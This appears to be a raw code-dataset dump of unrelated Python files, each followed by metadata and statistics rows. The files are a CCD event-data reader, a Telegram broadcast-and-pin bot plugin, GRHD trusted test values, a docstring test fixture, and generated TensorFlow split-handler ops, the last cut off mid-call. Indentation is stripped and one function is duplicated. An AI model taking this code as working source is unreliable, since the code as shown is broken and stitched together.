evs, tms, cnt, afr, mask, tr = neigercompress(evs, tms, cnt, afr, mask, tr, fr, thr, it, ll, lp)
trace[i] = tr
it += 1
if not os.path.exists(savdir):
answ = input("create a director (y)/n")
if answ == "n":
print("exit")
exit()
else:
os.makedirs(savdir)
print("directory " + savdir + " has been created")
afr = afr / n_frames
afr = np.reshape(afr, (nx, ny))
mask = np.reshape(mask, (nx, ny))
evs, tms, c = nprepare(np.ravel(evs), np.ravel(tms))
evs = np.array(evs[:c], np.int8)
tms = tms[:c]
print("Reading time %3.3f sec" % (time.time() - t0))
return evs, tms, cnt, afr, n_frames, mask, trace
def get_ccd_event_datan(datdir, prefd, sufd, nf1, nf2, darkdir, df1, df2, sname, lth, bADU, tADU, mNp, aduph, savdir, mask_file, thr=20, frc=0.15):
### read ccd edf images and convert for Pierre's event correlator using numba ####
t0 = time.time()
swrite = stdout.write
sflush = stdout.flush
print("start reading the files")
# creating filenames
filenames = nfiles.filename(datdir + prefd, sufd, nf1, nf2)
lfilenames = len(filenames) # -1
# reading first image to get dimenstions of the matrix
headers = EdfMethods.headeredf(filenames[0])
dim1 = np.intc(headers['Dim_1'])
dim2 = np.intc(headers['Dim_2'])
nx = dim2
ny = dim1
############reading mask##########
try:
mask_data = EdfMethods.loadedf(mask_file)
print("use mask file " + mask_file)
ind = np.where(mask_data > 0)
for_norm = dim1 * dim2 - len(mask_data[ind])
except:
mask_data = np.zeros((dim2, dim1), np.uint8)
print("no mask applied")
for_norm = dim1 * dim2 # 1024**2
pass
print("Numebr of pixels used " + str(for_norm))
########reading dark##########
darkfilenames = nfiles.filename(darkdir + prefd, sufd, df1, df2)
ndarks = 0
for dfile in darkfilenames:
if ndarks == 0:
darkimg = np.asfarray(EdfMethods.loadedf(dfile), dtype=np.float32)
else:
darkimg += np.asfarray(EdfMethods.loadedf(dfile), dtype=np.float32)
ndarks += 1
darkimg = darkimg / ndarks
n_frames = len(filenames)
ll = nx * ny # total number of pixels
lp = int(n_frames * frc) # total number of frames with events 15%
mask = np.array(np.ravel(mask_data), np.uint8)
evs = np.zeros((ll, lp), np.uint8)
tms = np.zeros((ll, lp), np.uint16)
cnt = np.ravel(np.zeros((ll,), np.uint16))
afr = np.ravel(np.zeros((ll,), np.uint32))
tr = 0
trace = np.zeros((n_frames,), np.uint32)
it = 0
print("Number of frames %d" % n_frames)
###########reading and summing files###########
for i in range(lfilenames):
swrite(4 * '\x08')
swrite(str(int(i * 100. / lfilenames)) + '%')
sflush()
matr = np.asfarray(EdfMethods.loadedf(filenames[i]), dtype=np.float32)
try:
matr[ind] = 0
except:
pass
msumpix, mpix, fr = dropimgood(matr, darkimg, lth, bADU, tADU, mNp, aduph, nx, ny) # dropletize CCD frames
fr = np.ravel(fr)
evs, tms, cnt, afr, mask, tr = neigercompress(evs, tms, cnt, afr, mask, tr, fr, thr, it, ll, lp)
trace[i] = tr
it += 1
if not os.path.exists(savdir):
answ = input("create a director (y)/n").lower()
if answ == "n":
print("exit")
exit()
else:
os.makedirs(savdir)
print("directory " + savdir + " has been created")
afr = afr / n_frames
afr = np.reshape(afr, (nx, ny))
mask = np.reshape(mask, (nx, ny))
evs, tms, c = nprepare(np.ravel(evs), np.ravel(tms))
evs = np.array(evs[:c], np.int8)
tms = tms[:c]
print("Reading time %3.3f sec" % (time.time() - t0))
return evs, tms, cnt, afr, n_frames, mask, trace
@nb.jit(nopython=True, parallel=True, fastmath=True)
def neigercompress(evs, tms, cnt, afr, m, tr, fr, thr, i, ll, max_e):
tr = 0
for p in nb.prange(ll):
afr[p] += fr[p]
if fr[p] > thr:
m[p] = 1
if m[p] > 0:
fr[p] = 0
if fr[p] > 0:
c = cnt[p] + 1
evs[p, c] = fr[p]
tms[p, c] = i
cnt[p] = c
tr += fr[p]
return evs, tms, cnt, afr, m, tr
@nb.jit(nopython=True, fastmath=True)
def nprepare(evs, tms):
ll = evs.size
i = 0
for p in range(ll):
if evs[p] > 0:
evs[i] = evs[p]
tms[i] = tms[p]
i += 1
return evs, tms, i
| 32.326226
| 147
| 0.566783
| 2,042
| 15,161
| 4.157199
| 0.125367
| 0.016021
| 0.022971
| 0.025445
| 0.814819
| 0.791613
| 0.782189
| 0.766286
| 0.757097
| 0.749676
| 0
| 0.027044
| 0.270761
| 15,161
| 468
| 148
| 32.395299
| 0.740774
| 0.100983
| 0
| 0.763587
| 0
| 0
| 0.067134
| 0.003958
| 0
| 0
| 0
| 0
| 0
| 1
| 0.038043
| false
| 0.016304
| 0.032609
| 0
| 0.100543
| 0.089674
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
d5b35c26d1380ae4ceef61cd7793dba035ae6dae
| 3,243
|
py
|
Python
|
Yukki/Plugins/broadcast.py
|
Guddu7866/YukkiMusic-Old
|
a6d04fb434d5302e187c11d41be5964914e9e329
|
[
"MIT"
] | null | null | null |
Yukki/Plugins/broadcast.py
|
Guddu7866/YukkiMusic-Old
|
a6d04fb434d5302e187c11d41be5964914e9e329
|
[
"MIT"
] | null | null | null |
Yukki/Plugins/broadcast.py
|
Guddu7866/YukkiMusic-Old
|
a6d04fb434d5302e187c11d41be5964914e9e329
|
[
"MIT"
] | null | null | null |
import asyncio
from Yukki import app, OWNER
from pyrogram import filters, Client
from pyrogram.types import Message
from Yukki.YukkiUtilities.database.chats import (get_served_chats, is_served_chat, add_served_chat, get_served_chats)
from ..YukkiUtilities.helpers.filters import command
@app.on_message(filters.command("broadcastt_pin") & filters.user(OWNER))
async def broadcast_message_pin(_, message):
if not message.reply_to_message:
pass
else :
x = message.reply_to_message.message_id
y = message.chat.id
sent = 0
pin = 0
chats = []
schats = await get_served_chats()
for chat in schats:
chats.append(int(chat["chat_id"]))
for i in chats:
try:
m = await app.forward_messages(i, y, x)
try:
await m.pin(disable_notification=False)
pin += 1
except Exception:
pass
await asyncio.sleep(.3)
sent += 1
except Exception:
pass
await message.reply_text(f"✅ **broadcasted message in {sent} chats\n\n📌 with {pin} pins.**")
return
if len(message.command) < 2:
await message.reply_text("**usage**:\n/broadcast (message)")
return
text = message.text.split(None, 1)[1]
sent = 0
pin = 0
chats = []
schats = await get_served_chats()
for chat in schats:
chats.append(int(chat["chat_id"]))
for i in chats:
try:
m = await app.send_message(i, text=text)
try:
await m.pin(disable_notification=False)
pin += 1
except Exception:
pass
await asyncio.sleep(.3)
sent += 1
except Exception:
pass
await message.reply_text(f"✅ **broadcasted message in {sent} chats\n📌 with {pin} pins.**")
@app.on_message(filters.command("broadcastt") & filters.user(OWNER))
async def broadcast_message_nopin(_, message):
if not message.reply_to_message:
pass
else:
x = message.reply_to_message.message_id
y = message.chat.id
sent = 0
chats = []
schats = await get_served_chats()
for chat in schats:
chats.append(int(chat["chat_id"]))
for i in chats:
try:
m = await app.forward_messages(i, y, x)
await asyncio.sleep(0.3)
sent += 1
except Exception:
pass
await message.reply_text(f"✅ **broadcasted message in {sent} chats")
return
if len(message.command) < 2:
await message.reply_text(
"**usage**:\n/broadcast (message)"
)
return
text = message.text.split(None, 1)[1]
sent = 0
chats = []
schats = await get_served_chats()
for chat in schats:
chats.append(int(chat["chat_id"]))
for i in chats:
try:
m = await app.send_message(i, text=text)
await asyncio.sleep(0.3)
sent += 1
except Exception:
pass
await message.reply_text(f"✅ **broadcasted message in {sent} chats")
| 32.108911
| 117
| 0.559359
| 399
| 3,243
| 4.433584
| 0.185464
| 0.067835
| 0.047484
| 0.067835
| 0.859808
| 0.845676
| 0.804975
| 0.759751
| 0.759751
| 0.759751
| 0
| 0.011236
| 0.341351
| 3,243
| 100
| 118
| 32.43
| 0.814139
| 0
| 0
| 0.833333
| 0
| 0
| 0.098057
| 0.013568
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0.083333
| 0.0625
| 0
| 0.104167
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
|
0
| 8
|
d5b68e12d86c5819f398ad988b111bab20fead06
| 9,180
|
py
|
Python
|
GRHD/tests/trusted_values_dict.py
|
kazewong/nrpytutorial
|
cc511325f37f01284b2b83584beb2a452556b3fb
|
[
"BSD-2-Clause"
] | null | null | null |
GRHD/tests/trusted_values_dict.py
|
kazewong/nrpytutorial
|
cc511325f37f01284b2b83584beb2a452556b3fb
|
[
"BSD-2-Clause"
] | null | null | null |
GRHD/tests/trusted_values_dict.py
|
kazewong/nrpytutorial
|
cc511325f37f01284b2b83584beb2a452556b3fb
|
[
"BSD-2-Clause"
] | null | null | null |
from mpmath import mpf, mp, mpc
from UnitTesting.standard_constants import precision
mp.dps = precision
trusted_values_dict = {}
# Generated on: 2019-11-03
trusted_values_dict['GRHD__generate_everything_for_UnitTesting__globals'] = {'h': mpf('2.84243280229405600425249403342661'), 'T4UU[0][0]': mpf('-2.3394549490075809540461930203703'), 'T4UU[0][1]': mpf('2.67395385292607006300096827671274'), 'T4UU[0][2]': mpf('0.939965144645438226830568588005522'), 'T4UU[0][3]': mpf('2.76759751772851491817709721309086'), 'T4UU[1][0]': mpf('2.67395385292607006300096827671274'), 'T4UU[1][1]': mpf('1.337142166855083843704646689613'), 'T4UU[1][2]': mpf('-1.05274338618835252181323562334297'), 'T4UU[1][3]': mpf('-0.114576053158084857454893301538389'), 'T4UU[2][0]': mpf('0.939965144645438226830568588005522'), 'T4UU[2][1]': mpf('-1.05274338618835252181323562334297'), 'T4UU[2][2]': mpf('-1.73967973788547621712965727684179'), 'T4UU[2][3]': mpf('1.31193965191419717041027546492777'), 'T4UU[3][0]': mpf('2.76759751772851491817709721309086'), 'T4UU[3][1]': mpf('-0.114576053158084857454893301538389'), 'T4UU[3][2]': mpf('1.31193965191419717041027546492777'), 'T4UU[3][3]': mpf('-0.604443288062090381548088559383176'), 'T4UD[0][0]': mpf('2.83678720098084041181897447718178'), 'T4UD[0][1]': mpf('0.99170966488207307046536066168503'), 'T4UD[0][2]': mpf('0.762525527627034351734872841405493'), 'T4UD[0][3]': mpf('1.40532191994996256600264920622054'), 'T4UD[1][0]': mpf('4.07782527337238635619480920902476'), 'T4UD[1][1]': mpf('2.94854490474811274282398149678141'), 'T4UD[1][2]': mpf('1.58980034997723138677767026254494'), 'T4UD[1][3]': mpf('2.92997571782266354716522785610529'), 'T4UD[2][0]': mpf('0.956403288253138570605431528094272'), 'T4UD[2][1]': mpf('0.484936857671444533867069753417502'), 'T4UD[2][2]': mpf('1.25378321108003804346626910022637'), 'T4UD[2][3]': mpf('0.68718942651262182120233854959868'), 'T4UD[3][0]': mpf('3.97441194653789208190487363110243'), 'T4UD[3][1]': mpf('2.01519470302763230130899798219118'), 'T4UD[3][2]': mpf('1.54948313867655601527304818986326'), 'T4UD[3][3]': mpf('3.73658704274670027678199791929124'), 'sqrtgammaDET': mpc(real='0.0', imag='0.499945342870952602609690984536428'), 'rho_star': mpc(real='0.0', imag='0.0725005943667336311131421666686947'), 'tau_tilde': mpc(real='0.0', imag='-0.458495693184290897814747722804896'), 'S_tildeD[0]': mpc(real='0.0', imag='0.284825823209035045024961618764792'), 'S_tildeD[1]': mpc(real='0.0', imag='0.219002565786328373675928560260218'), 'S_tildeD[2]': mpc(real='0.0', imag='0.403618102049098426142847984010587'), 'vU[0]': mpf('2.08491426500127978299119146687954'), 'vU[1]': mpf('0.48899075489912636090236059520818'), 'vU[2]': mpf('2.03204100392352701089202910127997'), 'rho_star_fluxU[0]': mpc(real='0.0', imag='0.151157523416274364169709087946103'), 'rho_star_fluxU[1]': mpc(real='0.0', imag='0.0354521203700244244561012862959615'), 'rho_star_fluxU[2]': mpc(real='0.0', imag='0.147324180562029810603874580010597'), 'tau_tilde_fluxU[0]': mpc(real='0.0', imag='0.290027754433007156631418865799787'), 'tau_tilde_fluxU[1]': mpc(real='0.0', imag='0.11963611462522005801645264000399'), 'tau_tilde_fluxU[2]': mpc(real='0.0', imag='0.309311702850052328006569268836756'), 'S_tilde_fluxUD[0][0]': mpc(real='0.0', imag='0.846842336525531980129244402633049'), 'S_tilde_fluxUD[0][1]': mpc(real='0.0', imag='0.456601573479797240295852134295274'), 'S_tilde_fluxUD[0][2]': mpc(real='0.0', imag='0.841509138574907611385356176469941'), 'S_tilde_fluxUD[1][0]': mpc(real='0.0', imag='0.139277194305751167435758475221519'), 'S_tilde_fluxUD[1][1]': mpc(real='0.0', imag='0.360095144644984488380146103736479'), 'S_tilde_fluxUD[1][2]': mpc(real='0.0', imag='0.197365520411941247624909578917141'), 'S_tilde_fluxUD[2][0]': mpc(real='0.0', imag='0.578777751737032608581046133622294'), 'S_tilde_fluxUD[2][1]': mpc(real='0.0', imag='0.445022193642278962588676449740888'), 'S_tilde_fluxUD[2][2]': mpc(real='0.0', imag='1.07317344796584079880119588779053'), 's_source_term': mpc(real='0.0', imag='1.55110161502608523420576602802612'), 'g4DD_zerotimederiv_dD[0][0][0]': mpf('0.0'), 'g4DD_zerotimederiv_dD[0][0][1]': mpf('2.82453965193931811047726120763399'), 'g4DD_zerotimederiv_dD[0][0][2]': mpf('2.97270977531302812223533834423186'), 'g4DD_zerotimederiv_dD[0][0][3]': mpf('3.79847558081713850681325630682511'), 'g4DD_zerotimederiv_dD[0][1][0]': mpf('0.0'), 'g4DD_zerotimederiv_dD[0][1][1]': mpf('1.0146252791684529623495906608225'), 'g4DD_zerotimederiv_dD[0][1][2]': mpf('1.48255029867180718539104661334343'), 'g4DD_zerotimederiv_dD[0][1][3]': mpf('1.30149508798628607865498540480183'), 'g4DD_zerotimederiv_dD[0][2][0]': mpf('0.0'), 'g4DD_zerotimederiv_dD[0][2][1]': mpf('1.06823873665130213789461733131967'), 'g4DD_zerotimederiv_dD[0][2][2]': mpf('1.7249315550488847900098118758813'), 'g4DD_zerotimederiv_dD[0][2][3]': mpf('1.22349428638397231919749158107256'), 'g4DD_zerotimederiv_dD[0][3][0]': mpf('0.0'), 'g4DD_zerotimederiv_dD[0][3][1]': mpf('1.9841241069050865236076525529547'), 'g4DD_zerotimederiv_dD[0][3][2]': mpf('1.41428843593649790398494427617507'), 'g4DD_zerotimederiv_dD[0][3][3]': mpf('1.90602915532016463180382060987578'), 'g4DD_zerotimederiv_dD[1][0][0]': mpf('0.0'), 'g4DD_zerotimederiv_dD[1][0][1]': mpf('1.0146252791684529623495906608225'), 'g4DD_zerotimederiv_dD[1][0][2]': mpf('1.48255029867180718539104661334343'), 'g4DD_zerotimederiv_dD[1][0][3]': mpf('1.30149508798628607865498540480183'), 'g4DD_zerotimederiv_dD[1][1][0]': mpf('0.0'), 'g4DD_zerotimederiv_dD[1][1][1]': mpf('0.325289877717340858431782635307172'), 'g4DD_zerotimederiv_dD[1][1][2]': mpf('0.782429103366857114920662752410863'), 'g4DD_zerotimederiv_dD[1][1][3]': mpf('0.676632991755518276022485224530101'), 'g4DD_zerotimederiv_dD[1][2][0]': mpf('0.0'), 'g4DD_zerotimederiv_dD[1][2][1]': mpf('0.132730541646038369130167211551452'), 'g4DD_zerotimederiv_dD[1][2][2]': mpf('0.836312473789907029342316491238307'), 'g4DD_zerotimederiv_dD[1][2][3]': mpf('0.104922007479875012414538559823995'), 'g4DD_zerotimederiv_dD[1][3][0]': mpf('0.0'), 'g4DD_zerotimederiv_dD[1][3][1]': mpf('0.578414010116952703732806639891351'), 'g4DD_zerotimederiv_dD[1][3][2]': mpf('0.348217748091978251956390977284173'), 'g4DD_zerotimederiv_dD[1][3][3]': mpf('0.520709874711556830462200196052436'), 'g4DD_zerotimederiv_dD[2][0][0]': mpf('0.0'), 'g4DD_zerotimederiv_dD[2][0][1]': mpf('1.06823873665130213789461733131967'), 'g4DD_zerotimederiv_dD[2][0][2]': mpf('1.7249315550488847900098118758813'), 'g4DD_zerotimederiv_dD[2][0][3]': mpf('1.22349428638397231919749158107256'), 'g4DD_zerotimederiv_dD[2][1][0]': mpf('0.0'), 'g4DD_zerotimederiv_dD[2][1][1]': mpf('0.132730541646038369130167211551452'), 'g4DD_zerotimederiv_dD[2][1][2]': mpf('0.836312473789907029342316491238307'), 'g4DD_zerotimederiv_dD[2][1][3]': mpf('0.104922007479875012414538559823995'), 'g4DD_zerotimederiv_dD[2][2][0]': mpf('0.0'), 'g4DD_zerotimederiv_dD[2][2][1]': mpf('0.0443395816572931256160927659948356'), 'g4DD_zerotimederiv_dD[2][2][2]': mpf('0.791773059231473563812642169068567'), 'g4DD_zerotimederiv_dD[2][2][3]': mpf('0.517764594846885084500343054969562'), 'g4DD_zerotimederiv_dD[2][3][0]': mpf('0.0'), 'g4DD_zerotimederiv_dD[2][3][1]': mpf('0.904353827541312105253723530040588'), 'g4DD_zerotimederiv_dD[2][3][2]': mpf('0.4205452593776550784809842298273'), 'g4DD_zerotimederiv_dD[2][3][3]': mpf('0.562906443041600756949094375158893'), 'g4DD_zerotimederiv_dD[3][0][0]': mpf('0.0'), 'g4DD_zerotimederiv_dD[3][0][1]': mpf('1.9841241069050865236076525529547'), 'g4DD_zerotimederiv_dD[3][0][2]': mpf('1.41428843593649790398494427617507'), 'g4DD_zerotimederiv_dD[3][0][3]': mpf('1.90602915532016463180382060987578'), 'g4DD_zerotimederiv_dD[3][1][0]': mpf('0.0'), 'g4DD_zerotimederiv_dD[3][1][1]': mpf('0.578414010116952703732806639891351'), 'g4DD_zerotimederiv_dD[3][1][2]': mpf('0.348217748091978251956390977284173'), 'g4DD_zerotimederiv_dD[3][1][3]': mpf('0.520709874711556830462200196052436'), 'g4DD_zerotimederiv_dD[3][2][0]': mpf('0.0'), 'g4DD_zerotimederiv_dD[3][2][1]': mpf('0.904353827541312105253723530040588'), 'g4DD_zerotimederiv_dD[3][2][2]': mpf('0.4205452593776550784809842298273'), 'g4DD_zerotimederiv_dD[3][2][3]': mpf('0.562906443041600756949094375158893'), 'g4DD_zerotimederiv_dD[3][3][0]': mpf('0.0'), 'g4DD_zerotimederiv_dD[3][3][1]': mpf('0.678164989824203701118676690384746'), 'g4DD_zerotimederiv_dD[3][3][2]': mpf('0.203532350493731639673455902084243'), 'g4DD_zerotimederiv_dD[3][3][3]': mpf('0.524827105700638063545682143740123'), 'S_tilde_source_termD[0]': mpc(real='0.0', imag='1.969921052719972420774752208672'), 'S_tilde_source_termD[1]': mpc(real='0.0', imag='1.55863129079179651981235110724811'), 'S_tilde_source_termD[2]': mpc(real='0.0', imag='1.68702250656213159629714937182143'), 'u4_ito_3velsU[0]': mpf('0.432128853048890200135067074902976'), 'u4_ito_3velsU[1]': mpc(real='-0.321573801881636534005792782409117', imag='0.389071962663702697327039459196385'), 'u4_ito_3velsU[2]': mpc(real='-0.126064400660481829019587962648075', imag='0.337957092011890836147358641028404'), 'u4_ito_3velsU[3]': mpc(real='-0.339556874473260328350932013563579', imag='0.590982571120743149784004799585091')}
| 1,020
| 9,021
| 0.754466
| 1,135
| 9,180
| 5.931278
| 0.127753
| 0.161616
| 0.18063
| 0.033422
| 0.4847
| 0.424688
| 0.411913
| 0.099228
| 0
| 0
| 0
| 0.491995
| 0.033769
| 9,180
| 8
| 9,022
| 1,147.5
| 0.266967
| 0.002614
| 0
| 0
| 1
| 0
| 0.756609
| 0.660149
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.4
| 0
| 0.4
| 0
| 0
| 0
| 0
| null | 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 1
| 0
| 1
| 1
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
|
0
| 10
|
d5d3bce0d28b9aea737852fdb206cfa5c7834869
| 455
|
py
|
Python
|
tests/data/format/capitalization_first_letter/class_docstring.py
|
DanielNoord/pydocstringformatter
|
a69302cee6bd32b9b5cc48912a47d0e8ad3f7abe
|
[
"MIT"
] | 4
|
2022-01-02T22:50:59.000Z
|
2022-02-09T09:04:37.000Z
|
tests/data/format/capitalization_first_letter/class_docstring.py
|
DanielNoord/pydocstringformatter
|
a69302cee6bd32b9b5cc48912a47d0e8ad3f7abe
|
[
"MIT"
] | 80
|
2022-01-02T09:02:50.000Z
|
2022-03-30T13:34:10.000Z
|
tests/data/format/capitalization_first_letter/class_docstring.py
|
DanielNoord/pydocstringformatter
|
a69302cee6bd32b9b5cc48912a47d0e8ad3f7abe
|
[
"MIT"
] | 2
|
2022-01-02T11:58:29.000Z
|
2022-01-04T18:53:29.000Z
|
class MyClass:
"""a multi-line
docstring"""
class InnerClass:
"""
a multi-line
docstring"""
class MyClass:
"""a multi-line
docstring
"""
class InnerClass:
"""a multi-line
docstring
"""
class MyClass:
"""
a docstring"""
class InnerClass:
"""
a docstring"""
class MyClass:
"""A docstring"""
class InnerClass:
"""A docstring"""
| 12.638889
| 25
| 0.492308
| 40
| 455
| 5.6
| 0.175
| 0.4375
| 0.232143
| 0.339286
| 1
| 1
| 1
| 1
| 1
| 0.638393
| 0
| 0
| 0.375824
| 455
| 35
| 26
| 13
| 0.788732
| 0.305495
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 1
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 1
| 0
|
0
| 12
|
d5e3e4b097597b68a5c78724a6fed223e61545a9
| 22,228
|
py
|
Python
|
Server/ChatBot/venv/Lib/site-packages/tensorflow/contrib/boosted_trees/python/ops/gen_split_handler_ops.py
|
sozuer53/BBC
|
31bb128cb1e1a19db955fd673d67cf0e92bac3a4
|
[
"Apache-2.0"
] | 3
|
2018-11-27T06:30:23.000Z
|
2021-05-30T15:56:32.000Z
|
Server/ChatBot/venv/Lib/site-packages/tensorflow/contrib/boosted_trees/python/ops/gen_split_handler_ops.py
|
sozuer53/BBC
|
31bb128cb1e1a19db955fd673d67cf0e92bac3a4
|
[
"Apache-2.0"
] | 3
|
2020-09-26T01:09:47.000Z
|
2022-02-10T02:12:08.000Z
|
Server/ChatBot/venv/Lib/site-packages/tensorflow/contrib/boosted_trees/python/ops/gen_split_handler_ops.py
|
sozuer53/BBC
|
31bb128cb1e1a19db955fd673d67cf0e92bac3a4
|
[
"Apache-2.0"
] | 6
|
2020-04-13T15:33:30.000Z
|
2020-06-21T19:26:55.000Z
|
"""Python wrappers around TensorFlow ops.
This file is MACHINE GENERATED! Do not edit.
"""
import collections as _collections
from tensorflow.python.eager import execute as _execute
from tensorflow.python.eager import context as _context
from tensorflow.python.eager import core as _core
from tensorflow.python.framework import dtypes as _dtypes
from tensorflow.python.framework import tensor_shape as _tensor_shape
from tensorflow.core.framework import op_def_pb2 as _op_def_pb2
# Needed to trigger the call to _set_call_cpp_shape_fn.
from tensorflow.python.framework import common_shapes as _common_shapes
from tensorflow.python.framework import op_def_registry as _op_def_registry
from tensorflow.python.framework import ops as _ops
from tensorflow.python.framework import op_def_library as _op_def_library
_build_categorical_equality_splits_outputs = ["output_partition_ids", "gains",
"split_infos"]
_BuildCategoricalEqualitySplitsOutput = _collections.namedtuple(
"BuildCategoricalEqualitySplits",
_build_categorical_equality_splits_outputs)
def build_categorical_equality_splits(num_minibatches, partition_ids, feature_ids, gradients, hessians, class_id, feature_column_group_id, bias_feature_id, l1_regularization, l2_regularization, tree_complexity_regularization, min_node_weight, multiclass_strategy, name=None):
r"""Find the split that has the best gain for the accumulated stats.
Args:
num_minibatches: A `Tensor` of type `int64`.
A scalar, the number of times per example gradients & hessians
were accumulated. The stats are divided by this to get per example stats.
partition_ids: A `Tensor` of type `int32`.
A rank 1 tensor of partition IDs.
feature_ids: A `Tensor` of type `int64`. A rank 1 tensor of feature IDs.
gradients: A `Tensor` of type `float32`. A rank 1 tensor of gradients.
hessians: A `Tensor` of type `float32`. A rank 1 tensor of hessians.
class_id: A `Tensor` of type `int32`.
feature_column_group_id: An `int`.
bias_feature_id: An `int`.
l1_regularization: A `float`.
l2_regularization: A `float`.
tree_complexity_regularization: A `float`.
min_node_weight: A `float`.
multiclass_strategy: An `int`.
name: A name for the operation (optional).
Returns:
A tuple of `Tensor` objects (output_partition_ids, gains, split_infos).
output_partition_ids: A `Tensor` of type `int32`. A rank 1 tensor, the partition IDs that we created splits
for.
gains: A `Tensor` of type `float32`. A rank 1 tensor, for the computed gain for the created splits.
split_infos: A `Tensor` of type `string`. A rank 1 tensor of serialized protos which contains the
`SplitInfo`s.
"""
feature_column_group_id = _execute.make_int(feature_column_group_id, "feature_column_group_id")
bias_feature_id = _execute.make_int(bias_feature_id, "bias_feature_id")
l1_regularization = _execute.make_float(l1_regularization, "l1_regularization")
l2_regularization = _execute.make_float(l2_regularization, "l2_regularization")
tree_complexity_regularization = _execute.make_float(tree_complexity_regularization, "tree_complexity_regularization")
min_node_weight = _execute.make_float(min_node_weight, "min_node_weight")
multiclass_strategy = _execute.make_int(multiclass_strategy, "multiclass_strategy")
_ctx = _context.context()
if _ctx.in_graph_mode():
_, _, _op = _op_def_lib._apply_op_helper(
"BuildCategoricalEqualitySplits", num_minibatches=num_minibatches,
partition_ids=partition_ids, feature_ids=feature_ids,
gradients=gradients, hessians=hessians, class_id=class_id,
feature_column_group_id=feature_column_group_id,
bias_feature_id=bias_feature_id, l1_regularization=l1_regularization,
l2_regularization=l2_regularization,
tree_complexity_regularization=tree_complexity_regularization,
min_node_weight=min_node_weight,
multiclass_strategy=multiclass_strategy, name=name)
_result = _op.outputs[:]
_inputs_flat = _op.inputs
_attrs = ("feature_column_group_id",
_op.get_attr("feature_column_group_id"), "bias_feature_id",
_op.get_attr("bias_feature_id"), "l1_regularization",
_op.get_attr("l1_regularization"), "l2_regularization",
_op.get_attr("l2_regularization"),
"tree_complexity_regularization",
_op.get_attr("tree_complexity_regularization"),
"min_node_weight", _op.get_attr("min_node_weight"),
"multiclass_strategy", _op.get_attr("multiclass_strategy"))
else:
num_minibatches = _ops.convert_to_tensor(num_minibatches, _dtypes.int64)
partition_ids = _ops.convert_to_tensor(partition_ids, _dtypes.int32)
feature_ids = _ops.convert_to_tensor(feature_ids, _dtypes.int64)
gradients = _ops.convert_to_tensor(gradients, _dtypes.float32)
hessians = _ops.convert_to_tensor(hessians, _dtypes.float32)
class_id = _ops.convert_to_tensor(class_id, _dtypes.int32)
_inputs_flat = [num_minibatches, partition_ids, feature_ids, gradients, hessians, class_id]
_attrs = ("feature_column_group_id", feature_column_group_id,
"bias_feature_id", bias_feature_id, "l1_regularization",
l1_regularization, "l2_regularization", l2_regularization,
"tree_complexity_regularization",
tree_complexity_regularization, "min_node_weight",
min_node_weight, "multiclass_strategy", multiclass_strategy)
_result = _execute.execute(b"BuildCategoricalEqualitySplits", 3,
inputs=_inputs_flat, attrs=_attrs, ctx=_ctx,
name=name)
_execute.record_gradient(
"BuildCategoricalEqualitySplits", _inputs_flat, _attrs, _result, name)
_result = _BuildCategoricalEqualitySplitsOutput._make(_result)
return _result
_build_dense_inequality_splits_outputs = ["output_partition_ids", "gains",
"split_infos"]
_BuildDenseInequalitySplitsOutput = _collections.namedtuple(
"BuildDenseInequalitySplits", _build_dense_inequality_splits_outputs)
def build_dense_inequality_splits(num_minibatches, partition_ids, bucket_ids, gradients, hessians, bucket_boundaries, class_id, feature_column_group_id, l1_regularization, l2_regularization, tree_complexity_regularization, min_node_weight, multiclass_strategy, name=None):
r"""Find the split that has the best gain for the accumulated stats.
Args:
num_minibatches: A `Tensor` of type `int64`.
A scalar, the number of times per example gradients & hessians
were accumulated. The stats are divided by this to get per example stats.
partition_ids: A `Tensor` of type `int32`.
A rank 1 tensor of partition IDs.
bucket_ids: A `Tensor` of type `int64`. A rank 1 tensor of buckets IDs.
gradients: A `Tensor` of type `float32`. A rank 1 tensor of gradients.
hessians: A `Tensor` of type `float32`. A rank 1 tensor of hessians.
bucket_boundaries: A `Tensor` of type `float32`.
A rank 1 tensor, thresholds that were used for bucketization.
class_id: A `Tensor` of type `int32`.
feature_column_group_id: An `int`.
l1_regularization: A `float`.
l2_regularization: A `float`.
tree_complexity_regularization: A `float`.
min_node_weight: A `float`.
multiclass_strategy: An `int`.
name: A name for the operation (optional).
Returns:
A tuple of `Tensor` objects (output_partition_ids, gains, split_infos).
output_partition_ids: A `Tensor` of type `int32`. A rank 1 tensor, the partition IDs that we created splits
for.
gains: A `Tensor` of type `float32`. A rank 1 tensor, for the computed gain for the created splits.
split_infos: A `Tensor` of type `string`. A rank 1 tensor of serialized protos which contains the
`SplitInfo`s.
"""
feature_column_group_id = _execute.make_int(feature_column_group_id, "feature_column_group_id")
l1_regularization = _execute.make_float(l1_regularization, "l1_regularization")
l2_regularization = _execute.make_float(l2_regularization, "l2_regularization")
tree_complexity_regularization = _execute.make_float(tree_complexity_regularization, "tree_complexity_regularization")
min_node_weight = _execute.make_float(min_node_weight, "min_node_weight")
multiclass_strategy = _execute.make_int(multiclass_strategy, "multiclass_strategy")
_ctx = _context.context()
if _ctx.in_graph_mode():
_, _, _op = _op_def_lib._apply_op_helper(
"BuildDenseInequalitySplits", num_minibatches=num_minibatches,
